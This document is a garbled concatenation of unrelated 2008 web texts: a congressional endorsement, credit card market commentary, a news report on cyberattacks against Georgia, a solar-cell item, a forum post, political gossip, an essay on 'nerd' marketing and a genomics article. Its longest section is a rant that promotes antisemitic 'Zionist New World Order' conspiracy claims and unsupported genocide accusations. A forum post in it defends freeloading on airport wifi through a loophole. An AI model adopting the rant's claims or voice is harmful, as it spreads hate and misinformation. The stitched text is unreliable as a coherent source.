That is why I have given my wholehearted endorsement to Collins Bailey for Congress in Maryland 's 5th congressional district . "
Paul attained cult - like status this year when during his bid for the Republican Presidential candidate position he fearlessly spoke truth - to - power , spoke boldly against the war in Iraq , and advocated significantly reduced federal governmental powers .
Bailey also received an endorsement from Tony O'Donnell , Republican Minority Leader in the Maryland House of Delegates .
O'Donnell 's endorsement reads : " I have known Collins Bailey for many years .
He is a good man who wants to maintain a strong nation rooted in the values that have made this nation great .
Collins Bailey has worked for decades at the local level to demonstrate his commitment and he certainly deserves the consideration and support of the residents of Maryland 's 5th congressional district . "
Bailey offered his own platform to complement the endorsements : " I love this district and its people .
Our federal government is out of touch with working America , spending is out of control , gas prices continue to rise , and our jobs and our money are going overseas .
I believe America is ready for change .
I believe America is ready for leadership .
I believe America is tired of finger pointing , excuses and party politics .
I will cut wasteful spending , reduce the size of government , and promote sound money , individual responsibility , economic and personal liberty , American independence and national sovereignty .
I will work with anyone that has America 's best interest at heart . "
The Republicans did not run a candidate against Hoyer in 2006 .
Hoyer faced the Green Party 's Steve Warner , who armed with a campaign war chest of around $ 6,000 , compared to Hoyer 's million - plus pot , took approximately 17 % of the vote .
Although considered a landslide in political terms , Warner 's faring proved that not everyone is happy with Hoyer in Southern Maryland .
Working in Bailey 's favor this year is the fact that the balance between registered Democratic and Republican voters and Calvert , Charles and St. Marys counties has been steadily approaching equilibrium , where Democrats once held a clear advantage .
However , Bailey is running at the tail end of a Republican - led administration that popularity polls identify as the least popular presidency since Richard Nixon .
The end of the Bush presidency also finds the American economy in crisis - mode - - a key factor for voter 's on election day .
Even though the approval rating for Congress is lower than the President 's , the number of incumbent Congressmen that were voted out of office in 2006 was trivial in comparison — perhaps indicating that while the public is unhappy with Congress in general , it is the other guy 's representative with whom they are displeased .
Maryland 's 5th congressional district encompasses Calvert , Charles and St. Marys counties and portions of Prince Georges and Anne Arundel counties .
Though the trend is a boon for the companies that issue the cards , analysts worry that there could be long - term problems not only for consumers but also for the anemic economy and the already - troubled banks that will be underwriting all that risky debt .
" Right now what we 're seeing is the US consumer losing their disposable income as they have to spend more and more on necessities because of higher prices for gas and food , " says Ron Ianieri , a market strategist and co-founder of the Options University investor education center .
" Normally when you have a certain budget and you can't keep up with the budget one of the easy steps is to extend that budget using credit . "
One of the main problems with that is US consumers — and their counterparts in Europe as well — already are delinquent on their credit card payments in numbers not seen in six years .
The Federal Reserve last week said credit card delinquencies hit 4.86 percent in the first quarter in 2008 , while revolving debt — or the type used in credit purchases — hit $ 957.2 billion in March , a 7.9 percent increase .
As all that risky , high - interest debt keeps accumulating , consumers will find themselves deeper in a hole that threatens to keep the economy in its sluggish state .
Economists worry that the problems are being exacerbated by consumers using credit not only to buy big - screen TVs and patio furniture , but also to pay their mortgages and shop for groceries .
" There 's a significant risk to people who are using credit cards to help them try to bridge the gaps that they 're facing , " says Sean Snaith , director of the University of Central Florida 's Institute for Economic Competitiveness .
" The reality is the economic picture is n't going to clear up instantaneously . "
Meanwhile , the banks that underwrite the credit card debt stand to lose as the delinquencies continue to rise .
Standard & Poor 's on Monday issued a dour forecast for banks in 2008 , in part because of their exposure to bad debt .
Ianieri ranks his " starting five " in terms of exposure to risky debt : Lehman Brothers , Citigroup , Bank of America , UBS and Merrill Lynch .
" It 's a disaster , it 's a time bomb , " Ianieri says .
" The credit crisis is a lot more severe than it 's being made out to be .
I think the government is doing everything it can to keep the severity of this situation under wraps from the general population .
I think they 're just trying to bide time for these banks . "
For the credit card companies , though , it 's a different story .
Little to Lose
Visa and Mastercard back comparatively little of the credit actually issued through their cards , meaning they have a low level of risk for defaults and other payment issues .
They get paid a fee each time someone uses their cards , and the banks that issue the cards assume responsibility for the debt .
As such , investors and analysts are fawning over the two companies in the face of consumer cash issues and the growth of emerging markets , where credit cards are only beginning to find popularity .
" The reality is probably some of it is hype , but some is based on fact , " Snaith says .
" ' Check or cash ' has been replaced by ' debit or credit ' and that 's going to be a continuing trend not just in the US but spreading worldwide . "
In a note issued last Thursday , Lehman Brothers raised its outlook on Mastercard , escalating its price target to $ 335 from $ 300 .
Other analysts have joined in the enthusiasm , with Stifel Nicolaus on Tuesday jacking up its price target from $ 312 to $ 367 .
Visa has gained from the enthusiasm for Mastercard .
As of noontime trade Tuesday , both Visa and Mastercard were up more than 12 percent since May 23 .
" They have no risk .
It 's per transaction , " says Nadav Baum , managing director of investments at BPU Investment Management .
" That 's why Visa and Mastercard are bucking the trend when it comes to the other financial companies .
Even though they group them as a financial company , they 're really not . "
Lehman analyst Bruce Harting , in his research note on Mastercard , pointed out that the company believes it can duplicate its US business model in countries including Brazil , Hungary , Poland , Russia , India and China , nations where it projects 39 percent revenue growth .
Similarly , Americans shopping abroad might be more inclined to use their plastic as the dollar begins to gain ground against other currencies .
A purchase in euros now could cost fewer dollars by the time the next monthly bill rolls around if the US currency continues to appreciate .
" That 's another reason why Mastercard and Visa will continue to do well , " Baum says .
" It 's all hand - in - hand . "
Finally , there are the responsible consumers who pay their bills in full every month and are joining the legions of people who no longer want to carry cash .
They enjoy taking advantage of the rapid growth of retailers and restaurants offering debit options , plus using points they can accumulate by utilizing their cards .
" The danger is in painting with a broad brush and casting all consumers as reluctant or unable to spend , " says Greg McBride , senior analyst at Bankrate.com .
" There are a lot of consumers that are not in the state of distress and can continue to spend in a manner that 's not very different than a year or two ago when the economy was stronger .
The card - holders that pay their balance in full every month , the incentive is for them to use the cards as much as possible . "
In Georgia , media , communications and transportation companies were also attacked , according to security researchers .
Shadowserver saw the attack against Georgia spread to computers throughout the government after Russian troops entered the Georgian province of South Ossetia .
The National Bank of Georgia ’s Web site was defaced at one point .
Images of 20th - century dictators as well as an image of Georgia ’s president , Mr. Saakashvili , were placed on the site .
“ Could this somehow be indirect Russian action ?
Yes , but considering Russia is past playing nice and uses real bombs , they could have attacked more strategic targets or eliminated the infrastructure kinetically , ” said Gadi Evron , an Israeli network security expert .
“ The nature of what ’s going on is n’t clear , ” he said .
The phrase “ a wilderness of mirrors ” usually describes the murky world surrounding opposing intelligence agencies .
It also neatly summarizes the array of conflicting facts and accusations encompassing the cyberwar now taking place in tandem with the Russian fighting in Georgia .
In addition to D.D.O.S. attacks that crippled Georgia ’s limited Internet infrastructure , researchers said there was evidence of redirection of Internet traffic through Russian telecommunications firms beginning last weekend .
The attacks continued on Tuesday , controlled by software programs that were located in hosting centers controlled by a Russian telecommunications firms .
A Russian - language Web site , stopgeorgia.ru , also continued to operate and offer software for download used for D.D.O.S. attacks .
Over the weekend a number of American computer security researchers tracking malicious programs known as botnets , which were blasting streams of useless data at Georgian computers , said they saw clear evidence of a shadowy St. Petersburg - based criminal gang known as the Russian Business Network , or R.B.N .
“ The attackers are using the same tools and the same attack commands that have been used by the R.B.N. and in some cases the attacks are being launched from computers they are known to control , ” said Don Jackson , director of threat intelligence for SecureWorks , a computer security firm based in Atlanta .
He noted that in the run-up to the start of the war over the weekend , computer researchers had watched as botnets were “ staged ” in preparation for the attack , and then activated shortly before Russian air strikes began on Saturday .
PhD Student Discovers Method to Produce Solar Cells in Pizza Oven
August 21st , 2008 by Ariel Schwartz
Solar power usage is growing in the United States , Europe , and Australia , but what about developing areas that do n’t even have access to basic electricity ?
Now that University of NSW PhD student Nicole Kuepper has developed a cheap and simple way of producing solar cells in a pizza oven , these areas might get a chance to use solar power too .
Photovoltaic cells are generally expensive to produce and require large manufacturing plants .
But Kuepper ’s technology needs relatively low - cost items such as ovens , ink - jet printers , and nail polish .
Her iJET solar cells also use a low - temperature process .
The technology will most likely be ready for commercialization in 5 years .
Kuepper speculates that the iJET could be used on - site in poor nations to provide otherwise scarce energy .
While I am interested to know exactly how efficient these low - cost solar cells are , they will be of limitless value to those who do n’t have any electricity at all .
Posts Related to Solar Energy :
Appreciate CleanTechnica ’s originality ?
Consider becoming a CleanTechnica member , supporter , or ambassador — or a patron on Patreon .
Sign up for our free daily newsletter or weekly newsletter to never miss a story .
Have a tip for CleanTechnica , want to advertise , or want to suggest a guest for our CleanTech Talk podcast ?
Contact us here .
Latest Cleantech Talk Episode
Wow , this thread got long .
I stopped reading after the West Point Cadet 's three points , but had to respond :
1 . Does this action attempt to deceive anyone or allow anyone to be deceived ?
* NO .
At no point in time does someone using this method claim or otherwise pretend to be a paying customer .
2 . Does this action gain or allow gain of a privilege or advantage to which I or someone else would not otherwise be entitled ?
* NO .
Anyone is capable of either paying for the service , or using this method .
Being uninformed , in either scenario , is not a valid excuse for claiming that they are not entitled .
3 . Would I be unsatisfied by the outcome if I were on the receiving end of this action ?
* NO .
If I were providing a service with a loophole that allowed it to be used free of charge , it would be my responsibility to fix the potential security risk .
It is YOUR OWN responsibility to look out for yourself .
If you can break into my house , you can have my stereo .
That 's why I have an alarm , video / audio security system , and personal protection , among other things .
If you are smart or powerful enough to bypass my security , I have failed at protecting myself .
A positive of that scenario is that in observing you , I have learned my own weakness .
If the analogy is lost on some of you , think of it this way - any entity providing internet access ought to have a security advisor / team .
It would n't take much to google " airport wifi " and see what comes up .
If you can't be bothered it 's your own fault .
A report out today that Joe Lieberman warned John McCain against selecting him to be on the GOP ticket is " totally and absolutely false , " according to a Lieberman source who contacted Politico .
Columnist Robert Novak wrote that the prospect of Lieberman on the ticket is real , but that McCain and some his top backers know it would be politically unrealistic .
" And this has been made clear to McCain by none other than Joe Lieberman himself , " writes Novak .
Not so , says a Lieberman source , stating categorically that the Connecticut senator has not contacted his Arizona colleague to say any such thing .
As I 've reported , Lieberman is very much being considered by McCain .
And it 's an indication of how much backers of the Democrat - turned - independent want the No. 2 slot that they would push back so hard against Novak 's report .
One person familiar with the situation said the Republican cited by Novak as having " prevailed on Lieberman to tell McCain that a McCain - Lieberman ticket would be a disaster for all concerned " was the source for the column and appeared to be " pushing an agenda . "
comments closed
permalink
There comes a time when one has to call a spade a spade and let the chips fall where they may .
I detest liars and our government is lined wall - to - wall with such deceitful morons hiding their agendas behind those lies .
This Zionist New World Order is overflowing with liars and their lying operatives infesting many nations ... like Merkel in Germany , Brown in UK , and Sarkozy in France .
Our main stream media is packed down to the pixel with liars .
Americans need to be keenly aware of the efforts of the ' US government ' to cover up its tracks and wrongdoing regarding Georgia .
War crimes against the Russian Orthodox Christian citizens of South Ossetia were committed by Georgia , Ukraine , Israeli and US mercenaries .
DO NOT LOSE SIGHT OF THAT EVEN FOR ONE SECOND .
They are using in - your - face , raging propaganda in the TV and print media to paint the picture they want you to see .
They want Americans to buy off on their lies and deceit , yet again .
It has now come out that German automatic weapons were found in Georgia with some of the dead , injured and captured soldiers who attacked South Ossetia and were ousted from Abkhazia .
http://www.deutsche-welle.de/dw/article/0%2C2144%2C3571263%2C00.html
Angela Schmerkel - Ferkel evidently ' did have a dog in the hunt ' with German automatic weapons that were apparently illegally shipped to Georgia .
Illegal in the sense that Germany is very strict about arms exports and this one was not ' approved . '
But , hey , it was all about arming EU - wannabe , NATO - wannabe , Muslim - Zionist Jew controlled Central Asia Georgia so it could go into South Ossetia and massacre Russian citizen Christians .
One absurdity after another .
If non-Europe Georgia , sitting on the Russian border , qualifies for EU and NATO status , can Mongolia be far behind ?
And then there is North Korea since it , too , borders on Russia .
According to Schmerkel - Ferkel 's logic , apparently all Russian - bordering nations should be brought into NATO .
The Dimwits of DC have increased the levels of lies , spin and obfuscation to ludicrous levels .
Fresh out of the NATO emergency schmoozing session on August 19 , the Black Poodle has learned a new word : Rice Calls Russia An ' Outlaw ' http://www.breitbart.com/article.php?id=080819214402
.ynueq43q&show_article=1&catnum=3 ARF -ARF ! GRRRR !
OUTLAW !
GRRRR !
Yeah , G8 - NATO member Germany will now sign - off on such lies from Rice and Bush since illegal German arms were just found in Georgia .
Merkel will just tuck her little ferkel ( piglet ) tail tight and squeal whatever Bush and Rice want her to squeal .
She can now flit around with the Little Black Poodle idiot of a Secretary of State and bark , pee , and yip - yap at the heels of the giant Russian Bear on cue .
She , too , will call Russia ' bad names ' to hide the illegal activities of Germany , and the blatant war crimes of Georgia , Ukraine , Israel and the US .
What are we to do America when OUR outlaw government starts calling other nations outlaws ?
Simply , recognize the political lie for what it is .
These people are war criminals and murderers and they have set the propaganda spin cycle to industrial mode to deflect attention away from their actions in South Ossetia .
The Zionist New World Order just got decked flat on its ass in Georgia and South Ossetia .
Pay attention to how ' shrill ' the music will be from DC to cover its tracks , and from its NWO co-conspirators in the UK , France and Germany .
We will not see Japan or China chime in for this bullshit because they have had enough of it and they truly could not care less what the Zionist Jews want .
BBC did an interview with Rice after this emergency NATO session .
Had I been sitting across from her I would have ripped this lying wretch a new ass .
I have never seen more preposterous , bald - faced lies in my life than those Bush and Rice are spewing right now to cover their tracks .
I am trying to find a copy of the Poodle 's performance to provide to Rense.com so all Americans can see what a war criminal liar looks like .
I loved the SHOCK HEADLINE of the NATO EMERGENCY GEORGIA CRISIS SUMMIT : < start insert > NATO freezes Russian ties over Georgia Tue Aug 19 , 2008 2:08 pm EDT By Mark John and Francois Murphy BRUSSELS ( Reuters ) - NATO agreed ' after U.S. pressure ' on Tuesday to freeze regular contacts with Russia until Moscow had withdrawn its troops from Georgia in line with a peace deal .
The alliance also agreed to upgrade contacts with Tbilisi but stopped short of accelerating its efforts to join NATO , an ambition which had enraged Russia even before the two - week - old conflict over Georgia 's breakaway South Ossetia region .
" We have determined that we cannot continue with business as usual , " the 26 NATO states said in a joint declaration issued after emergency talks in Brussels .
The statement did not explicitly refer to a U.S. demand to suspend contacts within the six - year - old NATO - Russia Council ( NRC ) , but NATO Secretary - General Jaap de Hoop Scheffer said it was clear such contacts could not take place at present .
" As long as Russian forces are basically occupying a large part of Georgia I can not see a NATO - Russia Council convening at whatever level , " he told a news conference .
< end insert > Except for the US and Zionist New World Order ... there would be no ' crisis ' in Georgia .
Well , Russia 's response to these endless attempts to cover up Western war crimes committed against South Ossetia Christians may well end up FREEZING much of Europe this winter as Russia cuts off natural gas and oil supplies to response to these liars trying to spin their way out of their murderous actions .
Note that NATO " agreed after US pressure . "
I noticed that Scheiffer was about to have a Depends Moment just as Merkel - Ferkel was in Sochi during her press conference with Medvedev .
( She was probably informed by Medvedev that illegal German weapons had been found in Georgia .
There are probably dead South Ossetia Christians as a result of those illegal German automatic weapons . )
I already knew Zbigniew Brzezinski was an idiot .
His Grand Chessboard scheme was the most ludicrous plan I have ever read .
We have now witnessed 7 years of BushCo efforts to turn this Russia - hating , Russia - baiting slimy snake of a plan into a thoroughbred race horse .
The BushCo Zionists failed and they will continue to fail .
A snake is a snake and no strategic vision , no strategic plan based on pure lies and greed will ever succeed .
It has become even more clear of late as to what a monumentally - twisted , sick - minded lunatic this Russia - phobic rat bastard Brzezinski truly is .
The man is a colossally - deluded schemer and even though most do not realize it , he is a Major League Diaper Pooper like Bush .
As the Neocon media DC spin cycle kicks into high gear to hide the latest BushCo war schemes and crimes by pointing the finger at Russia , TIME magazine rushes out with a Zbig article that is not only preposterous but it lays out a clear path to WWIII .
Zbig is suggesting criminal acts and more overt and covert aggression against Russia ... and flat out calls for regime change .
I wish this year 's presidential race was Schwarz versus Brzezinski .
I would love to debate this Russia - hating dinosaur on the merit of his words .
I have excerpted part of this TIME magazine bullshit piece below and added my response to each ...
http://www.time.com/time/world/article/0%2C8599%2C1832699%2C00.html
Staring Down the Russians By ZBIGNIEW BRZEZINSKI Zbigniew Brzezinski : " The end of the Cold War was supposed to usher in a new age in which the major powers would no longer dictate to their neighbors how to run their affairs .
That is why Russia 's invasion of Georgia is so tragic and so potentially ominous . "
Karl Schwarz : Interesting use of the word ' neighbor . '
So , in your defective mind , it is OK to keep pushing EU and NATO membership onto all of Russia 's immediate ' neighbors ' and to continue the provocation of Russia at every opportunity ?
Apparently , since Afghanistan , Iraq , Iran and now Georgia are on the other side of the world , it 's just fine to lie , fabricate wars and inflict US genocide on these countries since they are not direct ' neighbors ' of the US .
Russia invaded Georgia to stop the genocide of Russian citizens .
Are you such a lame - brain , Russia - hating jerk that you assume to have rights that Russians are not entitled to ?
Are you truly that stuck - on - stupid or merely that adept at lying in the face of facts and reality ?
Zbigniew Brzezinski : " Russia is now on watch :
Will it continue to rely on coercion to achieve its imperial aims or is it willing to work within the emerging international system that values cooperation and consensus ? "
Karl Schwarz : Well , as a matter of simple fact , and I hate to burst your delusional bubble , Zbig , the US IS now on watch !
The entire world is looking at the plans and schemes dreamed up by Ivory Tower morons like you - and the world is rejecting those idiotic , greedy , self - serving plans .
You really are quite emotional about losing , are n't you ?
For someone who quote conceived of the Grand Chessboard , you do n't seem to have a clue about what the word CHECKMATE means .
Russia , China , and the entire Caspian Basin are rejecting your ' geostrategic imperative ' vision of the world .
Zbigniew Brzezinski : " Moscow 's ruthless attempt to suborn , subdue and subordinate this tiny , independent democracy is reminiscent of Stalin 's times .
The assault onGeorgia is similar to what Stalin 's Soviet Union did to Finland in 1939 : in both cases , Moscow engaged in an arbitrary , brutal and irresponsible use of force to impose domination over a weaker , democratic neighbor . "
Karl Schwarz : Damn , you have to go back to 1939 to cite an example ?
" Ruthless attempt ? '
Talk about deflecting from the realities of what really happened .
I can cite you much more recent US genocide events : Bosnia and Kosovo under the Clinton Administration , 1999 ; the US invasion of Afghanistan based on pure lies , October 7 , 2001 ; and the very same pathological lies and falsified intelligence used to justify annihilating Iraq , March 2003 .
The US needs far better minds than yours to stay current with the current day realities of this world , RIGHT NOW .
All of you incestuous DC think tank morons lie just as easily as blinking your eyes .
Here is another current citation - Georgia , August 2008 ... which as the world knows was a ' ruthless attempt ' by the US , Ukraine , Israel and Georgia to force its collective will on South Ossetia .
Russia responded to a blatant act of genocide being inflicted upon the Russian Orthodox Christian population of South Ossetia , all of whom are Russian citizens , I might add .
If you have to remain grounded in 1939 , why do n't you just retire and get the Hell out of the way ?
If we were to apply your faulty logic , the US definitely had no just cause whatsoever to attack Afghanistan in 2001 or Iraq in 2003 .
They were not ' neighbors ' of the US .
Nor is South Ossetia a ' neighbor ' of the US .
Zbigniew Brzezinski : " The question now is whether the global community can demonstrate to the Kremlin that there are costs for the blatant use of force on behalf of anachronistic imperialist goals . "
Karl Schwarz : Another interesting DC - speak weasel phrase : ' anachronistic imperialistic goals ' .
You must be referring to the Cold War Russia versus the Neocon Lunacy Neoconservative Imperialistic Goals , based on your book The Grand Chessboard and now dubbed the fraudulent Global War on Terror .
The entire world can clearly see that the only imperialistic nations on this planet TODAY are the UK and US , out lying , trying to steal oil and gas , trying to manipulate and control , and committing war crimes of egregious proportions .
" Blatant use of force ? " I guess you missed the Shock & Awe on CNN levied upon Afghanistan and Iraq , based on US lies .
Zbigniew Brzezinski : " This conflict has been brewing for years .
Russia has deliberately instigated the breakup of Georgian territory .
Moscow has promoted secessionist activities in several Georgian provinces : Abkhazia , Ajaria and , of course , South Ossetia . "
Karl Schwarz :
All of those districts voted in democratic elections to not be part of Georgia , to remain a part of Russia .
What part of those democratic processes are invalid to you ( in your delusional , equivocating mind ) but this hand picked war criminal puppet Saakashvili was a more legitimate election ?
Moscow did not promote those votes ; the people flat out do not want to be a part of Georgia , now 60 % Muslim and stinking to high heaven of Zionist Jew and US control , Kosher and lies does stink you know .
Who has been stirring this pot for years is the US .
Deny that and I will call you a liar to your face .
Zbigniew Brzezinski : " These efforts have intensified since the emergence in Georgia of a democratic , pro-Western government .
Russian Prime Minister Vladimir Putin's resentment toward Georgia and its President , the U.S. - educated Mikhiel Saakashvili , has seemingly become a personal obsession . "
Karl Schwarz : Since ' US education attainment ' levels ( and grasp of content ) have been falling like a rock for the past 40 years , is that where Mikey " The Mick " Saakashvili learned to talk on his cell phone and chew on his tie at the same time ?
Are his US - educated credentials the basis that you , and other idiots like you , assume this moron is fit to lead a nation ?
There is no personal obsession to it - war crimes were just committed against the Christian civilian population of South Ossetia .
Stop lying and face the music .
Zbigniew Brzezinski : " It has sponsored rebellious governments in these territories , armed their forces and even bestowed Russian citizenship on the secessionists . "
Karl Schwarz :
Those people voted almost 20 years ago to not be part of Georgia .
Respect their democratic rights or get the Hell out of Dodge .
Those people chose of their own free will to hold Russian passports .
Respect that or pack your bags .
In this bullshit article TIME ran for you , you made it abundantly clear that Georgia is important for your ' geostrategically imperative ' pipeline .
Russia could have blocked that off completely and did not .
Respect the rights of others or get the HELL OUT OF GEORGIA .
Zbigniew Brzezinski : " In recent weeks , a series of incidents along the fragile cease - fire lines that cut across Georgian territory helped prompt the escalation of violence , including Georgia 's abortive effort to remove the " government " of South Ossetia , a small region with a population of about 70,000 people .
That rash action was perhaps unwise , but it is evident from Russia 's military response that Moscow was waiting for such an act to provide a pretext for the use of force . "
Karl Schwarz :
You weasels are incredible : " abortive effort " and " perhaps unwise . "
I bet you and Madeline Albright are good friends .
You know her , do n't you ?
You and your kind could n't care less about 500,000 Iraqi children who perished during the US - enforced genocidal Iraq Sanctions .
You and your kind aided and abetted Clinton in the genocide of Serbian Christians by arming the Muslims to kill those Christians and then the ' honorable ' USA rides to the rescue of those Christians , dead by guns and bullets provided to the Muslims by America .
Your hand - picked , US - educated puppet Saakashvili just perpetrated genocide on over 2,000 people , aided and abetted every step of the way by the Ukraine , Zionist Israel and the UNITED STATES OF AMERICA .
Tell the truth , or shut the hell up .
Zbigniew Brzezinski : " Russia 's aggression toward Georgia should not be viewed as an isolated incident .
The fact is , Putin and his associates in the Kremlin do n't accept the post - Soviet realities . "
Karl Schwarz :
And those ' post - Soviet realities ' in your feeble , twisted mind proffer that this is a ' unipolar ' world , led by the US only and run by idiots like you ?
No wonder you are orchestrating the Barky for President campaign .
The simple fact of the matter is - in these ' post - Soviet realities ' - that the US has been a war criminal for years and the two other Superpowers , Russia and China , are no longer going to listen to idiots like you .
Let me know when you figure out how to get the smoke back into the jar , idiot .
Zbigniew Brzezinski : " Ukraine could well be the next flash point .
The Russian leadership has already openly questioned whether it needs to respect Ukraine 's territorial integrity .
Russian leaders have also remarked that Crimea , a part of Ukraine , should once again be joined to Russia . "
Karl Schwarz :
Well , I hate to burst your bubble again Zbig , but most of Ukraine holds the US , the Zionist New World Order , George Soros and lame - brains like you in total contempt .
You are not ' held high ' by the vast majority of people in the Ukraine .
Russia has offered passports to Ukraine and you will soon learn that most of those people would rather be Russian citizens than live under the boot heels of idiots like Yuchenko and Brzezinski who stay stuck in the past with delusional visions of the future .
The Zionist - controlled government of Ukraine was involved in these South Ossetia atrocities .
That is a known fact .
It has nothing to do with ' territorial integrity . '
It has to do with the difference between the truth and idiot plans like yours based on pure , unadulterated lies in preposterous proportions .
Zbigniew Brzezinski : " The stakes are high .
Ultimately , the independence of the post - Soviet states is at risk .
Russia seems committed to the notion that there should be some sort of supranational entity , governed from the Kremlin , that would oversee much of the former Soviet territories .
This attitude reflects in part the intense nationalistic mood that now permeates Russia 's political élite . "
Karl Schwarz :
Those stakes are only ' high ' for the US , Zbig .
This is no longer a unipolar world , and it never will be again .
You need to get a new ' gig ' .
Your worn out " hate Russia " routine is out of touch with reality .
Zbigniew Brzezinski : " For the West , especially the U.S. , the conflict between Russia and Georgia poses both moral and geostrategic challenges .
The moral dimension is self - evident : a small country that gained its independence only recently , after almost two centuries of Russian domination , deserves international support that goes beyond simple declarations of sympathy . "
Karl Schwarz : " Moral ? "
You consider the genocide of the Balkans , Iraq , Afghanistan and now South Ossetia ­ by the US and its puppets - to be on some moral high ground for the US ?
What an idiot you are .
" Geostrategic challenges ? "
You just do n't get it , man .
Your Chessboard ' geostrategic imperative ' game is over .
We lost thanks to short - sighted idiots like you who have no valid view of the future .
" Declarations of sympathy " for poor little war criminal Georgia ?
What about the 2,000 dead South Ossetia Christians killed by the US puppet Saakashvili ?
Have sympathy for them or get the Hell out of the US political process .
Karl Schwarz : Russia just responded in a very clear and very unambiguous manner to US AGGRESSION and IMPERIALISM .
It amazes me how you DC weasels always try to turn things around backwards .
Maybe you have not noticed , but the entire World is condemning US behavior .
Maybe if you were not a rich elitist snob you would better understand the damage your not - at - all - brilliant ideas have caused America .
You do not have to worry about another Cold War , Zbig .
You idiots have gone so far past the norms of acceptable behaviour the threat of war will be a VERY HOT WAR thanks to idiots like you pushing stupid , unattainable agendas .
Zbigniew Brzezinski : " The Georgian crisis is a critical test for Russia .
If Putin sticks to his guns and subordinates Georgia and removes its freely elected President - something Putin's Foreign Minister has explicitly called for - it is only a question of time before Moscow turns up the heat on Ukraine and the other independent but vulnerable post -Soviet states .
The West has to respond carefully but with a moral and strategic focus .
Its objective has to be a democratic Russia that is a constructive participant in a global system based on respect for sovereignty , law and democracy .
But that objective can be achieved only if the world makes clear to Moscow that a stridently nationalistic Russia will not succeed in any effort to create a new empire in our postimperial age . "
Karl Schwarz :
You 're a WEASEL , LIAR and an IDIOT .
IT 'S THE POLICIES , STUPID .
What you are saying in that paragraph , in typical DC - speak equivocation , is you are proposing a FORCED ' regime change ' in Moscow .
Nothing personal , IDIOT , but I , as a Conservative American , think the wisest regime change needed on this planet is a complete house cleaning in Washington , DC to get rid of ' geostrategic imperative ' shitheads like you .
You know what , Zbig ?
I am not a Polish - born American like you , I am an American - born American .
It occurs to me that your National Security ideas for the United States have proven to be such a colossal failure , I am now compelled to ask , as an American - born American , just exactly who 's side are you on ?
You are a moron , and your ideas have seriously jeopardized the National Security of the United States of America .
" Postimperial age ? "
Evidently , you have not a clue about the ramifications of your big , fancy words ... especially when the US is clearly engaged in ' Post - Soviet US Imperialism ' all over the world , right now .
-----
At 11:45 am CET , 5:45 am Eastern , the US and Poland have just signed the Bush ' Defensive ' Missile Shield deal in Warsaw .
Of course , after the Little Black Poodle left the Emergency NATO Georgia Crisis meeting in Brussels , she scurried right over to Warsaw to sign off on the monumentally idiotic BushCo ' defensive ' missile scam .
Just yesterday , in fact , Poland admitted that the system IS to be aimed at Russia , that Poland is not concerned about Iranian missiles at all .
Among Russia 's responses will be the refueling of their strategic nuclear bombers in Cuba , the retargeting of Russian nuclear weapons systems toward the EU , and the installation of Russian nukes in the Mediterranean and Syria , among other things .
The Poodle 's signature has all but guaranteed that the Western world is now standing at the edge of the WWIII abyss .
Karl
If something is ' nerdish ' , then that means most businesses cannot profit from that activity .
Nerd probably came from a term at the Rensselaer Polytechnic Institute from the origin of Knurd ( which is drunk spelled backwards ) .
Unlike the drunk , the ' knurd ' drinks heavily of knowledge and does practically everything opposite of the ' drunk ' .
But have you noticed how some things are considered ' nerd ' while other things are not ?
And , even more strange , these things change over time .
Take books .
Books are considered ' nerdish ' .
However , television is full of advertising .
So it makes sense that marketing would portray television as " mainstream " and books as " nerd " .
They want television to appear ' cool ' so they can make money .
Take staying at home for the evening .
This is considered ' nerdish ' .
However , if you go to a fancy club , restaurant , or something else , this is marketed as ' mainstream ' and ' cool ' .
No one makes money if you stay at home for the evening so no wonder they will belittle it .
Take music .
Classical music is ' nerdish ' .
However , pop-culture music is marketed as ' mainstream ' and ' cool ' .
The reason is because they make money off the ' hip - hop ' .
How can they make money off of Beethoven and Bach ?
Take clothes .
Keeping care of your clothes and having them last a while is ' nerdish ' .
However , ' sticking with the fashions ' is marketed as mainstream and cool .
The reason is because they make money when you keep changing fashions .
They make no money if you stick with your clothes .
I think you are seeing the point .
Now , let us look at how some of the ' nerd ' things change .
Take the Internet .
The Internet was a haven for nerds .
But as soon as companies could make money off the Internet , then the Internet became ' awesome ' and ' mainstream ' .
Companies who have the Internet as a threat such as newspapers , and certain colleges still try to paint the image that the Internet is for " unsocial nerdish quacking misfits " .
Take video games .
In the eighties , video games were seen for ' nerds ' .
However , as soon as gigantic companies such as Sony and Microsoft moved in , they have produced marketing that says , " Hey , gaming is now mainstream !
Gaming is hip and cool ! "
Most video game players have bought this hook , line , and sinker .
If you account for population growth and multiple console ownership , gaming has not really grown .
In fact , it has even decreased in some areas .
( A steady decline over ten years in Japan reversed with the DS phenomenon currently over there .
In America , the trend has been downward for a couple of years . )
As soon as the major companies moved in , they put out the marketing that it is ' mainstream ' and ' cool ' because they want your money .
It is that simple .
Another video - game example would be the recent invention of the word " hardcore gamer " .
This used to be the ' nerd ' .
But they call them ' hardcore gamers ' because they can now make money off of you .
This is similiar to Hollywood calling those who watch movies all day to be ' greatly cultured ' where you could easily call them dorks .
( Hollywood wo n't say that because they make money off them , obviously . )
So any time you see the ' nerd ' versus ' cool ' mantra , follow the money .
Anything in society that people cannot make much money off of is going to be condemned as ' nerdish ' .
Just be who you are , follow your own interests , and ignore this advertising imagery that drapes society .
When they were n’t competing to map the human genome , it often seemed like James Watson and Craig Venter were vying for the title of world ’s most candid scientist .
Now their genomes are doing battle , and the loser seems to be the biological concept of race .
A new comparison of the scientists ’ publicly available genome sequences indicates that , although Watson and Venter are both white men , they will react to some drugs quite differently .
Watson ’s genome hosts a mutation in a drug - metabolising gene rarely found in Caucasians .
“ It shows that James Watson has some Korean blood in him , or some Asian blood anyway , ” says Howard McLeod , a pharmacologist at the University of North Carolina in Chapel Hill .
“ He would n’t get good pain relief from codeine . ”
Nor much effect from antipsychotic drugs , some antidepressants and a drug commonly used to treat breast cancer , say Venter and Pauline Ng , of the J. Craig Venter Institute in Rockville , Maryland , who compared the scientists ’ genomes .
Venter used the analysis to make a simple point :
Advertisement
“ Race - based medicine does n’t have any real basis in science , ” he told New Scientist .
“ You can look at somebody ’s skin colour , but it does n’t necessarily tell you much about the rest of their genome or how they ’ll respond to drugs or which drugs they ’ll respond to . ”
Consensus view
Last year , Watson quit his job as head of Cold Spring Harbor Laboratory in New York after a British newspaper quoted him making disparaging remarks about the intelligence of people from Africa .
He later apologised and noted : “ There is no scientific basis for such a belief . ”
The latest analysis supports the conclusion that skin colour does n’t convey as much medically useful information as knowledge of individual genomes .
“ That became a consensus view back in the pre-Cambrian , or perhaps a tad earlier , ” says David Goldstein , a geneticist at Duke University in Durham , North Carolina .
